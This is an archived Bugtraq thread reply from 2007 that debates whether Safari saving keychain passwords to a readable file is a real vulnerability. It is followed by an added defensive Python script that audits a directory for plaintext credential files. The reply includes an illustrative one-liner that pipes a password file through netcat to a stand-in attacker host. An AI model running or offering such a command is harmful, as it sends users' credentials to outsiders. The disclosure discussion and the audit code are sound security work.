Re: Apple Safari on MacOSX may reveal user's saved passwords

Board: Bugtraq  Author: (not shown)  Time: 18 years ago (2007/05/19 00:03)  Votes: 0 (0 up, 0 down, 0 neutral)
0 comments, 0 participants, post 9 of 11 in the thread
On 17 May 2007, at 7:50 PM, graham.coles@the-logic-group.com wrote:

> It is also why I don't leave my machine logged in and accessible to
> other users, which appears to be the whole basis of this
> 'vulnerability'.

This is NOT the basis of the vulnerability. The point is that normally
malicious applications running as non-root are not able to read
keychained passwords. In this case, to steal passwords it is sufficient
to entice the victim to execute a malicious script; normally that is not
enough, since the keychain refuses access to untrusted applications.

This issue exposes keychained passwords, as those are saved in a text
file: an inexperienced user can lose his password by executing an
untrusted malicious shell script (i.e. "cat /home/pop/pass | nc
steal.com 666").

> The whole concept of the keychain, however, is to restrict access
> to its contents to the owner. If you can happily log in as the owner,
> then you have everything they can access, INCLUDING the keychain. If
> they can't do this, you just have some encrypted data. You don't HAVE
> to store web passwords, of course.

The keychain asks for a password when the owner wants to see his data,
and having access to a computer doesn't mean that you have the login
password too.

> If you are sitting at the machine of a person who has left it
> logged in and they use this feature, then whatever web browser you
> are using will believe you are that person and provide access to the
> website automatically--you don't need to see the password to use it.

And what if you gain 5 minutes of access to a laptop in the middle of
the desert, where an internet connection is missing . . .

> I'd like to know what Apple were supposed to do to fix this?

I think it's sufficient to untrust the injected code....

> It is, after all, YOUR keychain with YOUR passwords that YOU want
> applications to recover when YOU are logged in. Why shouldn't YOU
> be able to access it. If you don't want to use it don't, but if
> someone has to be logged in as you to read it, that sounds about
> right.

Right?? It's like having passwords saved in a text file and 'chmod 700'
it.

>>> Someone has *ROOT* access to your system REMOTELY over ssh and
>>> you're worried that they might be able to retrieve a password from
>>> your keychain.

Rooting a computer is really not the point; it's quite obvious that
"rooted comp" => "TOTAL compromise".

Let me ask a question: what if Safari makes the loaded password part of
the HTML so it's shown when clicking "view page source" ..?? Should it
be considered a vulnerability??

cheers,
-poplix

>> Yes, it would be annoying if someone rooted my laptop. It would be a
>> lot more annoying if they not only rooted my laptop but also
>> cleaned out my bank account via my browser.
>
> 'Annoying' is the understatement of the millennium.
>
> As far as root access goes, see my comments above regarding key
> loggers?
>
> With root access they will have your gpg file, they will know what
> processes are running (they will know when you run gpg) and they can
> capture your keystrokes. Is this then a vulnerability of gpg? So
> much for keeping your online banking safe. Even if you memorize the
> passwords, they can still see your keypresses and therefore empty
> your bank account.
>
> If someone roots your machine, security is non-existent and trust
> beyond repair. Don't trivialize this by comparing it to a 'might be
> able to see your web passwords' issue, this is disaster incarnate and
> game over all rolled into one!
>
>> It *is* somewhat disturbing that root can so trivially interfere with
>> the guts of someone else's processes. Normally, root has to do a
>> lot of work to do that.
>
> With great power comes great responsibility, which is precisely why
> Macs have the root login disabled and require a user designated as
> 'Administrator' to authenticate themselves whenever system files are
> modified or installed. Other users are created as non-administrator
> and remote login is blocked by the firewall. The chances of anyone
> actually logging in remotely as root on a normal Mac are zero as you,
> while administrator, would have to specifically enable all of this.
> This is why Apple warn you not to do it.
>
>>>> a different non-root user on the console can do it too
>>> Which again restricts this vulnerability (as previously mentioned)
>>> to an attacker who happens to be sitting in front of your
>>> machine(!)
>
>> Did you read the bit where I speculated about setuid applications?
>
> Yes, but again if you can get this far you either have the person's
> identity or root access (bad or hopeless situation respectively). Why
> worry incessantly about things that you stored in the keychain being
> accessed when someone can access everything you own.
>
> Should the keychain refuse to divulge its contents to a person
> authenticated as the owner?
>
> Is the answer to remove the keychain and watch as people revert to
> storing their passwords unencrypted in stickies, or text files on
> their desktop?
>
> You normally have to come up with a feasible attack vector for
> something to be a vulnerability, this seems far too early to be
> notifying the vendor.
>
> Saving passwords on any web browser is a lousy idea from a security
> perspective. However, people don't like security, they like
> convenience. The only real fix here is perhaps a disclaimer message
> advising people not to store important passwords for websites in the
> browser in the first place. But let's face reality, even if they did
> would it stop people doing it?
>
>> --
>> David Cantrell
>
> --
> Graham Coles
>
>
>
> The Logic Group Enterprises Limited
> Logic House, Waterfront Business Park, Fleet Road, Fleet,
> Hampshire, GU51 3SB, UK
> Registered in England. Registered No. 2609323
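The thread's disagreement comes down to two different trust boundaries: a keychain can refuse a request from an application the user has not approved, while a plain text file is readable by every process running as its owner, whatever its mode bits say. The following audit script is an added example, not code from poplix's post, from Apple, or from any of the other participants. It walks a directory the way a defender reviewing a home directory might, flags files whose name or first lines look like stored credentials (the name and line patterns are assumed heuristics), and reports each file's mode, whether group or other can read it, and whether the current process, running as the same user, can read it. The sample tree it builds (a `pass` file with mode 0600, a `notes/bank.txt` with a `password=` line) is constructed for the demonstration.

```python
"""Audit a directory tree for plaintext credential files (added example).

The point illustrated: a credential file with mode 0600 is still readable by
any process running as the owner, which is exactly the case a keychain with
per-application access control is meant to prevent. Patterns and file names
below are assumptions made for this demonstration, not part of any product.
"""
import os
import re
import stat
import tempfile

# Assumed heuristics: credential-looking file names and "key=value" / "key: value" lines.
NAME_PATTERN = re.compile(r"(pass|passwd|password|secret|credential|token)", re.I)
LINE_PATTERN = re.compile(r"^\s*(pass(word)?|pwd|secret|token)\s*[:=]\s*\S+", re.I | re.M)


def looks_like_credentials(path, max_bytes=4096):
    """Return True if the file name or its first bytes match a credential pattern."""
    if NAME_PATTERN.search(os.path.basename(path)):
        return True
    try:
        with open(path, "rb") as fh:
            head = fh.read(max_bytes).decode("utf-8", errors="replace")
    except OSError:
        return False
    return bool(LINE_PATTERN.search(head))


def audit_tree(root):
    """Walk root and return findings for suspicious plaintext files, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, sockets, etc.
                continue
            if not looks_like_credentials(path):
                continue
            findings.append({
                "path": os.path.relpath(path, root),
                "mode": stat.S_IMODE(st.st_mode),
                # Loose permissions: other accounts on the box can read it.
                "group_or_other_readable": bool(st.st_mode & (stat.S_IRGRP | stat.S_IROTH)),
                # The thread's point: same-uid processes can read it regardless of mode.
                "readable_by_this_process": os.access(path, os.R_OK),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Create a constructed sample home directory for the demonstration."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    os.makedirs(os.path.join(root, "notes"))
    # Constructed stand-in for the "/home/pop/pass" file mentioned in the thread.
    with open(os.path.join(root, "pass"), "w") as fh:
        fh.write("example.org: hunter2\n")
    os.chmod(os.path.join(root, "pass"), 0o600)  # owner-only, yet still readable by any same-uid process
    with open(os.path.join(root, "notes", "todo.txt"), "w") as fh:
        fh.write("buy milk\n")  # benign file, should not be flagged
    with open(os.path.join(root, "notes", "bank.txt"), "w") as fh:
        fh.write("login=alice\npassword=correct horse\n")  # flagged by content, not name
    os.chmod(os.path.join(root, "notes", "bank.txt"), 0o644)
    return root


if __name__ == "__main__":
    for finding in audit_tree(build_sample_tree()):
        print(finding)
```

Running it reports both credential files: `notes/bank.txt` (mode 0644, readable by other accounts) and `pass` (mode 0600, readable only by the owner but still readable by this process). The second finding is the one the thread is about: tightening the mode changes nothing for a script the user is tricked into running, so the remediation is to move such secrets into a store that checks the calling application, not just the uid.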
Article code (AID): #16JSuw00 (Bugtraq)